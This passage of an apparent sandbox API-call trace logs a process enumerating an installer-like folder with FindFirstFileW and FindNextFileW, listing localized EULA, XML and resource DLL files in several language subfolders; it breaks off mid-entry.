ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.042] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.042] FindNextFileW (in: hFindFile=0x604238, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.042] FindClose (in: hFindFile=0x604238 | out: hFindFile=0x604238) returned 1 [0196.043] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.043] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0196.043] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6046f8 [0196.044] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.044] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.044] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.044] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.045] FindNextFileW (in: hFindFile=0x6046f8, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.045] FindClose (in: hFindFile=0x6046f8 | out: hFindFile=0x6046f8) returned 1 [0196.045] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.045] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0196.045] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0196.045] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.045] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.045] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.045] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.046] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.046] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0196.046] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.046] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0196.046] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604578 [0196.046] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.046] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.046] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.047] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.047] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.047] FindClose (in: hFindFile=0x604578 | out: hFindFile=0x604578) returned 1 [0196.047] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.047] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3076", cAlternateFileName="")) returned 1 [0196.047] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604938 [0196.047] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.047] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.048] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed90, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.048] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.048] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.048] FindClose (in: hFindFile=0x604938 | out: hFindFile=0x604938) returned 1 [0196.048] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.048] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="3082", cAlternateFileName="")) returned 1 [0196.048] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.055] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.055] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.055] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.055] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.055] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.055] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.057] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.057] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Client", cAlternateFileName="")) returned 1 [0196.057] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Client\\*", lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604978 [0196.058] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf3768b28, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.058] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce2bc00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0xce2bc00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0xce2bc00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x31444, dwReserved0=0x0, dwReserved1=0x0, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0196.058] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0196.058] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x369f800 | out: lpFindFileData=0x369f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0x0, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0196.058] FindClose (in: hFindFile=0x604978 | out: hFindFile=0x604978) returned 1 [0196.058] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x4021290 | out: hHeap=0x5e0000) returned 1 [0196.058] FindNextFileW (in: hFindFile=0x6048f8, lpFindFileData=0x369fa7c | out: lpFindFileData=0x369fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbc518d00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbc518d00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbc518d00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x3ef6, dwReserved0=0x0, dwReserved1=0x240000, cFileName="DHtmlHeader.html", 